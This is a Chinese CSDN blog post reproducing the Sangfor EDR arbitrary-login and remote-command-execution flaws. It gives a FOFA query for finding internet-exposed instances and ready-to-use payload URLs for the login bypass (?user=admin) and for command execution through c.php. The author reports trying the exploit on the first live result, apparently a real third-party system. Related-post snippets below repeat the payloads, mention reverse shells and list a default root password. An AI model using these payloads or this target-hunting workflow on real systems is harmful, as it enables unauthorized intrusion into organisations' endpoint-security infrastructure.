深信服EDR漏洞复现

最新推荐文章于 2023-09-08 11:38:45 发布
最新推荐文章于 2023-09-08 11:38:45 发布
阅读量1.7k 收藏 1
点赞数 1
分类专栏: 中间件漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/108436218
版权

声明

往后,复现的每个漏洞,我都会分享出来,希望可以通过这种方式,提高自己的能力,也希望大家可以一起学习,共同进步

漏洞描述

据说是有人把源码放网上了,不过看了看源码审计的过程,也确实利用php反序列化,从而RCE

深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中,少数系统可以通过外网地址访问

影响范围

<=v3.2.19(任意用户登录)

v3.2.16-19(RCE)

复现过程

使用fofa搜索

title=“终端检测响应平台”

在这里插入图片描述

我就试了试第一个

点进去后

https://IP:PORT/ui/login.php
在这里插入图片描述

任意用户登录

将URL改成如下,直接进入后台

https://IP:PORT/ui/login.php?user=admin

在这里插入图片描述

RCE

payload为

https://IP:PORT/tool/log/c.php?strip_slashes=system&host=id
在这里插入图片描述

维梓-
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CNVD-2020-46552 信服EDR命令执行漏洞
nnn2188185的博客
03-22 924
信服终端监测响应平台(EDR)存在远程命令执行漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令。
EDR漏洞(CNVD-2020-46552)
PigLL的博客
08-24 1199
影响版本:v3.2.16,3.2.17,3.2.19 环境搭建:EDR 3.2.19 kali 使kali和EDR 3.2.19同在一个网段 登录EDR 3.2.19 账号:root 密码:edr@sangfor 登陆后发他是固定,然后将他IP改为与kali为同一网段 查看ip 任意用户登录 https://ip地址/ui/login.php?user=任意用户名 远程代码执行 利用python脚本反弹shell 使用kali监听4444端口 执行python脚本 返回kali 监听成功 ...
SXF终端检测平台 EDR漏洞
xk的博客
08-18 2970
昨天是2020年9月17日,对于做安全的人来说,特别是渗透红蓝对抗这种的,肯定印象极其刻: 其中不乏有巨佬坐镇的,也有混子摸鱼混经验的,各种操作姿势也是层出不穷: HW期间听闻的各种神操作: 无人机搞Wi-Fi的 挖下水道进内部的 BadUSB钓鱼的 提前半个月混入甲方的 望远镜看密码的 红队伪装蓝队进行木马钓鱼的 利用信服0day伪装进入的 首页开局一张图片的 美人计的 只有你想不到的,该做的都做了。害。 昨天最令人震惊的就是信服EDR设备,作为终端检测响应平台,竟然存在漏洞,还如此之
信服EDR终端检测响应平台RCE漏洞
cj_Hydra's Blog
08-18 4852
前言: 这个平台是干嘛的,这里就不废话了,刚好赶上了护网期间爆出来的,回头就被告知护网结束,这里简单一下。 : 第一步:通过fofa搜索语法title="终端检测响应平台"可以找到一大批使用该系统的站点。 第二步:随缘点击进去一个来到主界面,也就是这个样子。 第三步:构造payload,这里漏洞文件是c.php,漏洞参数是host /tool/log/c.php?strip_slashes=system&host=id 直接root权限 反弹shell。 ...
信服edr终端漏洞
qq_40806924的博客
08-20 4373
一、前言 最近这些天来了广州当蓝方,工作之余听到了几个朋友说关于信服edr爆0day的情况,自己也没时间,就简单记录一下。 该XXX简介: 信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 ** 二、影响范围 fofa上大概有37页
信服EDR主打PPT(商业版).pptx
09-16
信服EDR作为一款先进的终端安全解决方案,旨在应对日益杂的威胁环境,通过以AI为核心的技术,重构下一代终端安全,实从传统的防病毒策略向更智能、更全面的终端威胁检测与响应(EDR)转变。 终端安全的发展...
信服PT1-EDR题库
最新发布
06-04
信服认证PT1-EDR题库,亲测可过
信服edr终端检测响应平台(_3.2.21)代码审计挖掘(RCE)1
08-03
信服edr的这个版本中,存在一个允许执行任意命令的漏洞。 3. **C#软件/插件开发**:虽然具体漏洞细节没有提及C#编程语言,但标签指出问题与C#有关,可能意味着该平台的部分或全部是用C#编写的,因此需要关注C#...
信服EDR解决方案-V2.pptx
08-25
信服EDR解决方案-V2
信服edr终端检测响应平台(_3.2.21)代码审计挖掘(权限绕过)1
08-03
信服EDR终端检测响应平台代码审计挖掘(权限...信服EDR终端检测响应平台的代码中存在着严重的权限绕过漏洞,该漏洞可能会导致严重的安全问题。如果您正在使用该平台,请务必升级到最新版本,以避免可能的安全风险。
信服 EDR终端检测响应平台漏洞
Azjj
10-06 480
0x01 前言 信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 提示:以下是本篇文章正文内容,下面案例可供参考 0x02 影响范围 fofa关键字搜索:title=”终端检测响应平台” 0x03 远...
信服EDR任意用户登录与命令执行漏洞
剁椒鱼头没剁椒的博客
01-18 4238
终端检测响应平台(EDR)是信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。
信服 EDR终端检测响应平台 0day RCE 漏洞
xj28555的博客
08-18 893
0x01 介绍 信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 Fofa关键字: title=“终端检测响应平台” 如图 0x02 RCE payload https://xxx.com:xxx/tool/log/c.p
CNVD-2020-46552 信服EDR远程代码执行漏洞
afei001
01-19 939
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞 5.漏洞 1.漏洞概述 终端检测响应平台(EDR)是信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件和管理平台软件共同组成。2020年08月18日左右检测到信服EDR存在远程代码执行漏洞。该漏洞编号为CNVD-2020-46552。攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。 ...
漏洞信服科技EDR平台存在任意用户登录漏洞
失心少年
09-08 704
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。fofa:title=“终端检测响应平台”
【HW2020漏洞回顾】信服EDR两大漏洞
wuguojie888的博客
08-20 9039
信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中,少数系统可以通过外网地址访问。 NO.1 后台任意用户登陆漏洞 【详情】攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权..
【HW2020漏洞回顾】信服EDR两大漏洞(转载)
jianye33的博客
08-25 3066
信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中,少数系统可以通过外网地址访问。 NO.1 后台任意用户登陆漏洞 【详情】攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。漏洞影响版
信服行为感知系统&&日志中心 远程命令执行漏洞
西米安全
06-07 2626
标题 声明 1、该公众号发布文章仅供学习使用。 2、请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 漏洞描述 信服行为感知系统&&日志中心 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行 影响范围 信服 行为感知系统和日志中心 漏洞 漏洞地址: /tool/log/c.php?strip_slashes=system&host= 首页: 执行: https://ip/tool/log/c.php?strip_sla
信服行为感知系统和终端检测响应平台EDR REC渗透测试
kelenwait的博客
06-24 1779
简介 信服行为感知系统和终端检测响应平台EDR信服科技股份有限公司推出的安全产品,其行为感知系统 c.php 存在远程命令执行漏洞,与其相同模板的还有部分EDR,同样导致远程命令执行。 漏洞影响 信服EDR 3.2.16 信服EDR 3.2.17 信服EDR 3.2.19 信服 行为感知系统 漏洞 登录界面 c.php 远程命令执行漏洞 使用以下poc进行访问 /tool/log/c.php?strip_slashes=system&host=echo hello /tool/l
信服edr怎么卸载
09-02
信服EDR是一款安全软件,卸载步骤可能会有所不同,具体取决于你使用的操作系统和版本。一般来说,你可以尝试以下步骤来卸载信服EDR: 1. 打开控制面板(Windows用户)或者系统偏好设置(Mac用户)。 2. 在控制面板或者系统偏好设置中,找到并点击“程序”或者“应用程序”选项。 3. 在程序列表中,找到信服EDR并选择卸载选项。 4. 根据提示完成卸载过程。 如果以上方法无法卸载信服EDR,你还可以尝试以下方法: 1. 打开任务管理器(Ctrl+Shift+Esc),在进程选项卡中结束与信服EDR相关的进程。 2. 找到信服EDR的安装文件夹(一般位于C:\Program Files\Sangfor\EDR目录),手动删除相关文件和文件夹。 3. 打开注册表编辑器(运行regedit命令),在HKEY_LOCAL_MACHINE\SOFTWARE\Sangfor\EDR路径下删除相关注册表项。 卸载软件时,请确保备份重要数据和文件,并谨慎操作。如果你对操作不确定或遇到问题,建议你联系信服官方支持寻求进一步的帮助和指导。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值